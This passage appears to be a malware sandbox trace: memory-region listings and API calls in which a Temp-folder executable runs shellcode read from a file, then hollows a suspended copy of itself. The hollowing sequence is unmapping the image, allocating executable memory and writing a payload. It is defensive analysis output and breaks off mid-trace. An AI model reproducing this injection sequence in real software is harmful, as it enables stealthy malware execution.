0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 395 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 396 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 397 start_va = 0x410000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 398 start_va = 0x6c0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 399 start_va = 0x75b90000 end_va = 0x75beefff monitored = 0 entry_point = 0x75b94af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 400 start_va = 0x6c970000 end_va = 0x6c99afff monitored = 0 entry_point = 0x6c992e20 region_type = mapped_file name = "rtm.dll" filename = "\\Windows\\SysWOW64\\rtm.dll" (normalized: "c:\\windows\\syswow64\\rtm.dll") Region: id = 401 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 402 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 403 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 404 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 405 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 406 start_va = 0x75db0000 end_va = 0x771aefff monitored = 0 entry_point = 0x75f6b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 407 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 408 start_va = 0x77640000 end_va = 0x77676fff monitored = 0 entry_point = 0x77643b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 409 start_va = 0x74ed0000 end_va = 0x753c8fff monitored = 0 entry_point = 0x750d7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 410 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 411 start_va = 0x74810000 end_va = 0x7488afff monitored = 0 entry_point = 0x7482e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 412 start_va = 0x77680000 end_va = 0x776c4fff monitored = 0 entry_point = 0x7769de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 413 start_va = 0x77730000 end_va = 0x7773bfff monitored = 0 entry_point = 0x77733930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 414 start_va = 0x77390000 end_va = 0x7741cfff monitored = 0 entry_point = 0x773d9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 415 start_va = 0x74e70000 end_va = 0x74eb3fff monitored = 0 entry_point = 0x74e77410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 416 start_va = 0x77320000 end_va = 0x7732efff monitored = 0 entry_point = 0x77322e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 417 start_va = 0x74ec0000 end_va = 0x74ec6fff monitored = 0 entry_point = 0x74ec1e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 418 start_va = 0x6c950000 end_va = 0x6c96efff monitored = 0 entry_point = 0x6c959820 region_type = mapped_file name = "loadperf.dll" filename = "\\Windows\\SysWOW64\\loadperf.dll" (normalized: "c:\\windows\\syswow64\\loadperf.dll") Region: id = 419 start_va = 0x470000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 420 start_va = 0x500000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 421 start_va = 0x7c0000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 422 start_va = 0x6c940000 end_va = 0x6c94ffff monitored = 0 entry_point = 0x6c943820 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll") Region: id = 423 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 424 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 425 start_va = 0x8c0000 end_va = 0xa47fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 426 start_va = 0xa50000 end_va = 0xbd0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a50000" filename = "" Region: id = 427 start_va = 0xbe0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000be0000" filename = "" Region: id = 428 start_va = 0x1fe0000 end_va = 0x215ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fe0000" filename = "" Region: id = 429 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 430 start_va = 0x4b0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 447 start_va = 0x2160000 end_va = 0x22d8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002160000" filename = "" Region: id = 448 start_va = 0x22e0000 end_va = 0x245afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022e0000" filename = "" Region: id = 450 start_va = 0x2160000 end_va = 0x22d8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002160000" filename = "" Region: id = 451 start_va = 0x22e0000 end_va = 0x245afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022e0000" filename = "" Region: id = 452 start_va = 0x2160000 end_va = 0x22d8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002160000" filename = "" Region: id = 453 start_va = 0x22e0000 end_va = 0x245afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022e0000" filename = "" Region: id = 454 start_va = 0x2160000 end_va = 0x22d8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002160000" filename = "" Region: id = 455 start_va = 0x22e0000 end_va = 0x245afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022e0000" filename = "" Region: id = 456 start_va = 0x2160000 end_va = 0x22d8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002160000" filename = "" Region: id = 457 start_va = 0x22e0000 end_va = 0x245afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022e0000" filename = "" Thread: id = 5 os_tid = 0x79c [0117.183] GetCommandLineW () returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\pkypr.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\zpcthwca" [0117.183] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\pkypr.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\zpcthwca", pNumArgs=0x19ff68 | out: pNumArgs=0x19ff68) returned 0x517260*="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\pkypr.exe" [0117.187] _wfopen (_FileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\zpcthwca" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\zpcthwca"), _Mode="rb") returned 0x74e61268 [0117.187] VirtualAlloc (lpAddress=0x0, dwSize=0x136b, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0117.188] fread (in: _DstBuf=0x1e0000, _ElementSize=0x136b, _Count=0x1, _File=0x74e61268 | out: _DstBuf=0x1e0000*, _File=0x74e61268) returned 0x1 [0117.189] EnumDateFormatsW (lpDateFmtEnumProc=0x1e0000, Locale=0x0, dwFlags=0x0) [0117.191] LoadLibraryW (lpLibFileName="Shlwapi.dll") returned 0x77680000 [0117.192] GetTempPathW (in: nBufferLength=0x103, lpBuffer=0x19f980 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25 [0117.192] PathAppendW (in: pszPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", pMore="ow7v8lrfalu0lz3762" | out: pszPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\ow7v8lrfalu0lz3762") returned 1 [0117.192] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\ow7v8lrfalu0lz3762" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\ow7v8lrfalu0lz3762"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0117.192] GetFileSize (in: hFile=0x194, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2e3ff [0117.192] VirtualAlloc (lpAddress=0x0, dwSize=0x2e3ff, flAllocationType=0x3000, flProtect=0x4) returned 0x4b0000 [0117.192] ReadFile (in: hFile=0x194, lpBuffer=0x4b0000, nNumberOfBytesToRead=0x2e3ff, lpNumberOfBytesRead=0x19fd90, lpOverlapped=0x0 | out: lpBuffer=0x4b0000*, lpNumberOfBytesRead=0x19fd90*=0x2e3ff, lpOverlapped=0x0) returned 1 [0117.197] CloseHandle (hObject=0x194) returned 1 [0117.218] LoadLibraryW (lpLibFileName="ntdll.dll") returned 0x77830000 [0117.218] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19f484, nSize=0x103 | out: lpFilename="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\pkypr.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\pkypr.exe")) returned 0x2e [0117.218] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19ed00, nSize=0x103 | out: lpFilename="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\pkypr.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\pkypr.exe")) returned 0x2e [0117.218] GetCommandLineW () returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\pkypr.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\zpcthwca" [0117.218] CreateProcessW (in: lpApplicationName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\pkypr.exe", lpCommandLine="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\pkypr.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\zpcthwca", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19f3dc*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f440 | out: lpCommandLine="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\pkypr.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\zpcthwca", lpProcessInformation=0x19f440*(hProcess=0x198, hThread=0x194, dwProcessId=0x650, dwThreadId=0x84)) returned 1 [0117.270] GetThreadContext (in: hThread=0x194, lpContext=0x19f110 | out: lpContext=0x19f110*(ContextFlags=0x10007, Dr0=0x19f13c, Dr1=0x0, Dr2=0x19f25c, Dr3=0x77869ca4, Dr6=0x0, Dr7=0x778693b5, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x1a1714, FloatSave.ErrorSelector=0x7a0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x18, FloatSave.RegisterArea=([0]=0x3, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x2, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x3, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x2, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x1, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x25, [29]=0x2, [30]=0x0, [31]=0xc0, [32]=0xd4, [33]=0x57, [34]=0x68, [35]=0xf4, [36]=0xfa, [37]=0x94, [38]=0xd1, [39]=0x66, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x34, [45]=0xf2, [46]=0x19, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x3, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x2, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0xe8, [65]=0xf1, [66]=0x19, [67]=0x0, [68]=0xa0, [69]=0xf1, [70]=0x19, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x48, [77]=0x21, [78]=0x50, [79]=0x0), FloatSave.Cr0NpxState=0xf46857d4, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x37b000, Edx=0x0, Ecx=0x0, Eax=0x401000, Ebp=0x0, Eip=0x778a8fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25, [5]=0x2, [6]=0x0, [7]=0xc0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0xf2, [14]=0x19, [15]=0x0, [16]=0x2b, [17]=0xba, [18]=0x86, [19]=0x77, [20]=0x88, [21]=0xf2, [22]=0x19, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x9, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x50, [37]=0xf2, [38]=0x19, [39]=0x0, [40]=0x33, [41]=0xb8, [42]=0x86, [43]=0x77, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x59, [49]=0xb8, [50]=0x86, [51]=0x77, [52]=0x8e, [53]=0x97, [54]=0xd1, [55]=0x66, [56]=0xc8, [57]=0xf3, [58]=0x19, [59]=0x0, [60]=0x58, [61]=0xf4, [62]=0x19, [63]=0x0, [64]=0xc0, [65]=0xf3, [66]=0x19, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x4c, [73]=0xf2, [74]=0x19, [75]=0x0, [76]=0x88, [77]=0xf2, [78]=0x19, [79]=0x0, [80]=0xc8, [81]=0xf3, [82]=0x19, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x10, [93]=0xf2, [94]=0x19, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0xcc, [101]=0xff, [102]=0x19, [103]=0x0, [104]=0x30, [105]=0xee, [106]=0x8a, [107]=0x77, [108]=0xf6, [109]=0x44, [110]=0x5a, [111]=0x11, [112]=0xfe, [113]=0xff, [114]=0xff, [115]=0xff, [116]=0x59, [117]=0xb8, [118]=0x86, [119]=0x77, [120]=0x9e, [121]=0x1, [122]=0x87, [123]=0x77, [124]=0x20, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x4, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0xc0, [141]=0xf3, [142]=0x19, [143]=0x0, [144]=0x84, [145]=0xf2, [146]=0x19, [147]=0x0, [148]=0x1, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x58, [153]=0xf4, [154]=0x19, [155]=0x0, [156]=0xc0, [157]=0x1, [158]=0x87, [159]=0x77, [160]=0xea, [161]=0x97, [162]=0xd1, [163]=0x66, [164]=0x20, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x12, [173]=0x0, [174]=0x0, [175]=0x1, [176]=0x90, [177]=0xf2, [178]=0x19, [179]=0x0, [180]=0x6e, [181]=0x0, [182]=0x74, [183]=0x0, [184]=0x64, [185]=0x0, [186]=0x6c, [187]=0x0, [188]=0x6c, [189]=0x0, [190]=0x2e, [191]=0x0, [192]=0x64, [193]=0x0, [194]=0x6c, [195]=0x0, [196]=0x6c, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0xa3, [205]=0x97, [206]=0x86, [207]=0x77, [208]=0x9, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x40, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x9c, [277]=0xf3, [278]=0x19, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x16, [285]=0x0, [286]=0x18, [287]=0x0, [288]=0xe4, [289]=0xfd, [290]=0x19, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x86, [295]=0x77, [296]=0x98, [297]=0xf3, [298]=0x19, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x72, [305]=0x97, [306]=0xd1, [307]=0x66, [308]=0x88, [309]=0xf, [310]=0x51, [311]=0x0, [312]=0x98, [313]=0xf5, [314]=0x19, [315]=0x0, [316]=0xa6, [317]=0xad, [318]=0x8b, [319]=0x77, [320]=0x66, [321]=0xc1, [322]=0x88, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x2, [327]=0x0, [328]=0x38, [329]=0xf3, [330]=0x19, [331]=0x0, [332]=0x38, [333]=0xf3, [334]=0x19, [335]=0x0, [336]=0x38, [337]=0xf3, [338]=0x19, [339]=0x0, [340]=0x2, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x2, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x9a, [353]=0x96, [354]=0xd1, [355]=0x66, [356]=0xbc, [357]=0xf4, [358]=0x19, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0xb5, [365]=0x93, [366]=0x86, [367]=0x77, [368]=0xe4, [369]=0xf3, [370]=0x19, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x2c, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x58, [381]=0xf9, [382]=0x19, [383]=0x0, [384]=0xe4, [385]=0xfd, [386]=0x19, [387]=0x0, [388]=0x30, [389]=0x94, [390]=0x86, [391]=0x77, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x12, [397]=0x0, [398]=0x0, [399]=0x1, [400]=0x16, [401]=0x0, [402]=0x18, [403]=0x0, [404]=0xe4, [405]=0xfd, [406]=0x19, [407]=0x0, [408]=0x64, [409]=0x0, [410]=0x6c, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x2e, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x1c, [425]=0xf9, [426]=0x19, [427]=0x0, [428]=0x9c, [429]=0xb7, [430]=0x86, [431]=0x77, [432]=0xc8, [433]=0xf3, [434]=0x19, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0xa2, [441]=0x97, [442]=0xd1, [443]=0x66, [444]=0x1, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x20, [449]=0xf4, [450]=0x19, [451]=0x0, [452]=0x1, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0xcd, [465]=0x35, [466]=0x87, [467]=0x77, [468]=0x1, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x9, [477]=0x36, [478]=0x87, [479]=0x77, [480]=0x30, [481]=0xee, [482]=0x8a, [483]=0x77, [484]=0x48, [485]=0x21, [486]=0x50, [487]=0x0, [488]=0x4c, [489]=0xf4, [490]=0x19, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x1c, [505]=0xf9, [506]=0x19, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0117.273] ReadProcessMemory (in: hProcess=0x198, lpBaseAddress=0x37b008, lpBuffer=0x19f454, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x19f454*, lpNumberOfBytesRead=0x0) returned 1 [0117.273] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19ecc8 | out: Wow64Process=0x19ecc8*=1) returned 1 [0117.273] lstrlenW (lpString="pkypr.exe") returned 9 [0117.273] lstrlenW (lpString="ntdll.dll") returned 9 [0117.274] lstrlenW (lpString="pkypr.exe") returned 9 [0117.274] lstrlenW (lpString="ntdll.dll") returned 9 [0117.274] lstrlenW (lpString="ntdll.dll") returned 9 [0117.274] lstrlenW (lpString="ntdll.dll") returned 9 [0117.274] lstrlenW (lpString="tdll.dll") returned 8 [0117.274] lstrlenW (lpString="dll.dll") returned 7 [0117.274] lstrlenW (lpString="ll.dll") returned 6 [0117.274] lstrlenW (lpString="l.dll") returned 5 [0117.274] lstrlenW (lpString=".dll") returned 4 [0117.274] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0117.274] GetFileSize (in: hFile=0x1a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0117.274] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0x2160000 [0117.275] ReadFile (in: hFile=0x1a0, lpBuffer=0x2160000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19ec98, lpOverlapped=0x0 | out: lpBuffer=0x2160000*, lpNumberOfBytesRead=0x19ec98*=0x1784a0, lpOverlapped=0x0) returned 1 [0117.368] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x22e0000 [0117.414] CloseHandle (hObject=0x1a0) returned 1 [0117.414] VirtualFree (lpAddress=0x2160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0117.435] VirtualFree (lpAddress=0x22e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0117.459] NtUnmapViewOfSection (ProcessHandle=0x198, BaseAddress=0x400000) returned 0x0 [0117.463] VirtualAllocEx (hProcess=0x198, lpAddress=0x400000, dwSize=0x2f000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0117.469] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19ec98 | out: Wow64Process=0x19ec98*=1) returned 1 [0117.470] lstrlenW (lpString="pkypr.exe") returned 9 [0117.470] lstrlenW (lpString="ntdll.dll") returned 9 [0117.470] lstrlenW (lpString="pkypr.exe") returned 9 [0117.470] lstrlenW (lpString="ntdll.dll") returned 9 [0117.470] lstrlenW (lpString="ntdll.dll") returned 9 [0117.470] lstrlenW (lpString="ntdll.dll") returned 9 [0117.470] lstrlenW (lpString="tdll.dll") returned 8 [0117.470] lstrlenW (lpString="dll.dll") returned 7 [0117.470] lstrlenW (lpString="ll.dll") returned 6 [0117.470] lstrlenW (lpString="l.dll") returned 5 [0117.470] lstrlenW (lpString=".dll") returned 4 [0117.470] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0117.470] GetFileSize (in: hFile=0x1a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0117.471] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0x2160000 [0117.471] ReadFile (in: hFile=0x1a0, lpBuffer=0x2160000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19ec68, lpOverlapped=0x0 | out: lpBuffer=0x2160000*, lpNumberOfBytesRead=0x19ec68*=0x1784a0, lpOverlapped=0x0) returned 1 [0117.537] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x22e0000 [0117.592] CloseHandle (hObject=0x1a0) returned 1 [0117.593] VirtualFree (lpAddress=0x2160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0117.616] VirtualFree (lpAddress=0x22e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0117.638] NtWriteVirtualMemory (in: ProcessHandle=0x198, BaseAddress=0x400000, Buffer=0x4b0000*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x19eccc | out: Buffer=0x4b0000*, NumberOfBytesWritten=0x19eccc*=0x200) returned 0x0 [0117.669] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19ec98 | out: Wow64Process=0x19ec98*=1) 